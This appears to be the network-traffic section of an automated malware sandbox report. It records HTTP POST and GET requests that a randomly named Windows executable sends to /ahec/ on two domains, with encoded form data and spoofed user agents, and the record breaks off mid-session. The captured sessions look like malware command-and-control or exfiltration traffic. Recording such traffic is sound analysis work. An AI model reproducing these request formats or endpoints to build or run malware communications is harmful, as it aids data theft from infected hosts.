                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.54971774.208.236.181801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:45.215646982 CET809OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 6a 6b 4c 38 6f 42 31 70 33 44 6f 6e 48 43 78 44 43 77 3d 3d
                                                                          Data Ascii: KHcH=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjkL8oB1p3DonHCxDCw==
                                                                          Dec 2, 2023 18:47:45.362108946 CET634INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:45 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.54971874.208.236.181801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:47.876436949 CET829OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 6c 30 69 6d 58 4d 49 36 56 53 5a 50 61 74 69 71 54 68 62 7a 6e 7a 35 71 7a 55 67 6f 44 69 69 64 56 37 50 70 44 74 57 6c 5a 42 53 54 51 31 72 52 35 48 58 6d 6f 4b 61 6d 67 6e 52 66 58 6d 54 34 46 53 33 68 48 64 38 76 42 6a 50 77 35 52 6a 77 75 73 48 69 43 70 31 64 6f 79 63 63 6c 6a 73 53 2b 43 6e 68 49 78 61 44 6a 37 68 45 6f 5a 30 34 38 61 63 74 4a 4a 74 45 62 6a 69 77 55 54 75 52 5a 4e 43 58 64 51 46 4b 54 4b 58 65 48 49 32 64 69 63 57 56 43 35 31 76 59 59 53 62 77 3d
                                                                          Data Ascii: KHcH=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXeHI2dicWVC51vYYSbw=
                                                                          Dec 2, 2023 18:47:48.015408993 CET634INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:47 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.54971974.208.236.181801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:50.540918112 CET1842OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.jones4deepriver.com
                                                                          Origin: http://www.jones4deepriver.com
                                                                          Referer: http://www.jones4deepriver.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 74 30 6c 51 6a 4d 49 5a 39 53 59 50 61 74 6f 4b 54 6b 62 7a 6d 7a 35 71 36 66 67 6f 50 74 69 66 64 37 50 4c 4c 74 53 68 74 42 62 54 51 31 6d 78 35 58 54 6d 6f 6c 61 6d 78 76 52 65 6e 6d 54 34 46 53 33 69 66 64 36 2b 42 6a 4e 77 35 57 6b 77 75 34 51 79 43 52 31 64 42 46 63 63 78 5a 73 69 65 43 67 41 34 78 57 58 44 37 6f 45 6f 58 33 34 38 53 63 74 46 57 74 45 33 6e 69 30 63 31 75 54 4a 4e 42 77 34 5a 51 4b 48 74 56 76 6e 76 6b 64 53 4a 57 46 4b 70 69 76 6f 4f 48 73 45 6c 44 48 4f 2b 6e 77 4f 73 71 6a 44 5a 2f 32 67 6b 44 56 35 48 78 50 57 61 6d 6a 6e 63 56 46 45 71 49 58 41 49 71 33 57 2f 67 59 4c 2f 6a 66 6b 6e 41 75 62 55 53 74 72 36 4c 38 68 64 50 61 55 6a 64 4a 6b 43 6a 6f 4e 49 53 57 77 37 35 74 75 69 37 6a 70 4e 41 73 33 6c 77 75 6d 6c 77 6f 79 70 2f 2f 2b 2b 67 4e 70 6c 73 46 52 67 51 31 61 76 65 67 39 74 2f 5a 77 49 49 66 4b 4c 2f 4f 2f 5a 30 6c 2f 2f 63 73 46 67 5a 4e 61 6e 4a 77 54 77 42 75 71 63 72 47 69 52 31 51 2b 52 36 41 49 63 51 6b 5a 70 62 7a 63 50 42 7a 45 5a 6b 6a 6e 2f 67 55 6f 30 6d 70 50 72 36 79 68 4b 4c 77 61 62 4d 32 6c 74 66 34 34 7a 75 6b 69 52 59 5a 41 7a 71 6d 63 61 6f 6d 70 6d 47 77 37 74 5a 53 78 77 79 42 65 59 64 68 68 48 75 42 5a 57 48 70 6f 6e 4f 50 54 57 44 65 2f 30 70 62 4a 4b 46 69 36 75 62 58 79 2b 58 76 2b 2f 46 75 5a 53 56 31 4e 62 58 33 7a 31 79 54 65 35 46 44 72 4e 51 4a 4f 57 77 61 64 58 37 52 74 2f 79 45 31 42 49 4b 6a 77 49 68 38 61 77 4b 72 70 5a 41 4a 77 79 44 31 58 6a 2b 72 79 44 77 78 31 6e 32 65 72 43 49 76 44 39 62 55 34 6b 79 69 54 78 53 2f 66 59 34 67 6f 67 34 6b 79 77 72 41 6f 42 6d 4d 49 78 77 51 59 4c 63 41 47 4d 4b 64 70 6a 30 4f 49 57 36 35 50 62 52 5a 52 34 75 61 72 30 53 58 2f 70 44 41 37 70 47 63 71 73 70 70 6d 53 48 67 6b 64 64 56 39 4b 59 7a 44 2b 71 4e 6e 41 6b 51 78 45 44 4a 58 64 47 45 68 32 51 61 38 69 52 38 55 35 31 48 73 4e 67 38 31 33 63 31 45 33 49 67 73 57 48 76 76 52 39 6b 36 65 59 37 55 33 4d 74 56 54 49 2b 51 6a 4d 53 7a 4f 57 52 61 6d 53 68 6b 52 49 66 6a 48 6f 58 61 62 64 35 45 51 52 4f 41 4e 74 4f 59 4c 53 43 65 41 57 43 2f 6a 68 63 56 43 46 4f 38 44 78 35 51 61 68 54 31 38 73 50 65 38 54 58 37 6c 55 5a 4a 4d 4a 6e 6e 32 67 48 4a 75 58 44 70 73 50 34 49 4f 4f 78 4b 70 43 75 47 6e 4a 4a 75 44 51 79 56 2f 69 4c 57 6c 6a 50 57 78 50 59 67 34 31 55 38 69 7a 74 73 4e 4a 44 6b 49 53 41 36 7a 39 69 6f 72 56 48 72 48 6f 44 52 61 65 6d 50 65 2f 4a 6d 76 6b 6a 55 57 70 73 2f 76 39 64 48 6b 6d 43 63 4b 6d 55 44 70 6e 53 6c 49 2b 35 53 53 61 32 46 39 79 4d 6c 4c 4b 44 4e 4c 4a 4f 72 52 6a 4c 58 6c 43 66 5a 56 46 7a 69 69 50 78 61 35 41 6a 6e 6b 53 62 59 4c 6b 2b 33 30 33 56 64 35 55 32 78 4b 50 61 58 43 71 4e 4e 4d 2b 68 66 34 50 64 63 4e 37 77 53 44 62 6b 5a 7a 4a 33 56 67 6f 6d 74 41 57 4a 6f 42 4f 74 33 36 76 48 72 4a 72 32 34 50 69 75 45 53 76 6d 53 50 54 71 35 6e 6b 5a 78 4d 45 62 64 50 52 46 4f 4d 44 2f 48 72 7a 46 7a 34 35 64 66 44 46 39 4c 56 45 32 65 57 6a 54 2b 37 38 59 72 67 50 30 53 6e 71 47 67 2f 64 56 53 7a 49 4e 37 54 34 30 48 6f 56 49 2b 37 45 61 6b 55 36 73 33 37 4d 63 63 4e 67 2b 4d 4d 56 4e 5a 5a 46 4b 49 69 34 49 46 61 38 33 4d 7a 6a 50 48 34 70 4b 69 6c 5a 76 6e 6a 4c 6b 42 63 73 43 59 33 54 68 54 42 7a 62 36 4d 39 56 57 71 51 73 6e 42 7a 34 6a 6c 4f 6e 6d 6c 56 63 59 6c 72 46 4a 56 31 59 69 67 71 66 4d 55 4d 4e 63 56 72 61 34 75 45 63 30 61 72 2f 42 79 7a 7a 38 52 6c 46 50 79 6a 30 4c 62 54 67 57 41 4c 4a 69 35 6a 36 4e 6f 36 76 76 63 50 72 75 6c 7a 7a 4d 39 69 51 6b 70 73 53 51 2b 56 2b 4e 47 48 6e 6e 75 59 6a 39 44 61 48 7a 4a 34 33 41 4e 2f 70 5a 4f 36 2b 36
                                                                          Data Ascii: KHcH=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnt0lQjMIZ9SYPatoKTkbzmz5q6fgoPtifd7PLLtShtBbTQ1mx5XTmolamxvRenmT4FS3ifd6+BjNw5Wkwu4QyCR1dBFccxZsieCgA4xWXD7oEoX348SctFWtE3ni0c1uTJNBw4ZQKHtVvnvkdSJWFKpivoOHsElDHO+nwOsqjDZ/2gkDV5HxPWamjncVFEqIXAIq3W/gYL/jfknAubUStr6L8hdPaUjdJkCjoNISWw75tui7jpNAs3lwumlwoyp//++gNplsFRgQ1aveg9t/ZwIIfKL/O/Z0l//csFgZNanJwTwBuqcrGiR1Q+R6AIcQkZpbzcPBzEZkjn/gUo0mpPr6yhKLwabM2ltf44zukiRYZAzqmcaompmGw7tZSxwyBeYdhhHuBZWHponOPTWDe/0pbJKFi6ubXy+Xv+/FuZSV1NbX3z1yTe5FDrNQJOWwadX7Rt/yE1BIKjwIh8awKrpZAJwyD1Xj+ryDwx1n2erCIvD9bU4kyiTxS/fY4gog4kywrAoBmMIxwQYLcAGMKdpj0OIW65PbRZR4uar0SX/pDA7pGcqsppmSHgkddV9KYzD+qNnAkQxEDJXdGEh2Qa8iR8U51HsNg813c1E3IgsWHvvR9k6eY7U3MtVTI+QjMSzOWRamShkRIfjHoXabd5EQROANtOYLSCeAWC/jhcVCFO8Dx5QahT18sPe8TX7lUZJMJnn2gHJuXDpsP4IOOxKpCuGnJJuDQyV/iLWljPWxPYg41U8iztsNJDkISA6z9iorVHrHoDRaemPe/JmvkjUWps/v9dHkmCcKmUDpnSlI+5SSa2F9yMlLKDNLJOrRjLXlCfZVFziiPxa5AjnkSbYLk+303Vd5U2xKPaXCqNNM+hf4PdcN7wSDbkZzJ3VgomtAWJoBOt36vHrJr24PiuESvmSPTq5nkZxMEbdPRFOMD/HrzFz45dfDF9LVE2eWjT+78YrgP0SnqGg/dVSzIN7T40HoVI+7EakU6s37MccNg+MMVNZZFKIi4IFa83MzjPH4pKilZvnjLkBcsCY3ThTBzb6M9VWqQsnBz4jlOnmlVcYlrFJV1YigqfMUMNcVra4uEc0ar/Byzz8RlFPyj0LbTgWALJi5j6No6vvcPrulzzM9iQkpsSQ+V+NGHnnuYj9DaHzJ43AN/pZO6+6
                                                                          Dec 2, 2023 18:47:50.681034088 CET634INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:50 GMT
                                                                          Server: Apache
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.54972074.208.236.181801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:53.207398891 CET523OUTGET /ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.jones4deepriver.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:47:53.348030090 CET824INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Content-Length: 626
                                                                          Connection: close
                                                                          Date: Sat, 02 Dec 2023 17:47:53 GMT
                                                                          Server: Apache
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549721172.67.184.73801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:58.638782978 CET782OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 46 58 69 45 46 63 6e 59 54 68 35 54 57 42 2b 68 39 61 30 31 4b 74 66 59 75 78 39 43 57 42 71 65 69 62 54 79 65 4c 46 45 2b 49 37 6f 6a 68 62 4d 62 72 4f 34 37 44 49 71 64 58 59 76 44 6f 53 32 74 7a 70 49 46 55 7a 63 5a 48 67 6e 47 57 37 64 73 38 46 70 33 56 43 32 4a 6e 4d 63 63 67 72 76 2f 44 67 75 4c 74 59 35 7a 62 74 38 68 52 57 4e 50 2f 36 6f 39 47 53 73 6c 6b 44 6a 5a 6b 43 72 6d 45 62 44 47 62 41 49 57 74 73 4d 78 46 4a 69 30 61 33 53 59 64 43 49 6a 31 42 77 7a 6b 75 73 72 53 55 65 4d 35 31 47 56 6c 2f 42 69 4d 42 50 5a 41 3d 3d
                                                                          Data Ascii: KHcH=FXiEFcnYTh5TWB+h9a01KtfYux9CWBqeibTyeLFE+I7ojhbMbrO47DIqdXYvDoS2tzpIFUzcZHgnGW7ds8Fp3VC2JnMccgrv/DguLtY5zbt8hRWNP/6o9GSslkDjZkCrmEbDGbAIWtsMxFJi0a3SYdCIj1BwzkusrSUeM51GVl/BiMBPZA==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549722172.67.184.73801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:01.837263107 CET802OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.poria.link
                                                                          Origin: http://www.poria.link
                                                                          Referer: http://www.poria.link/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
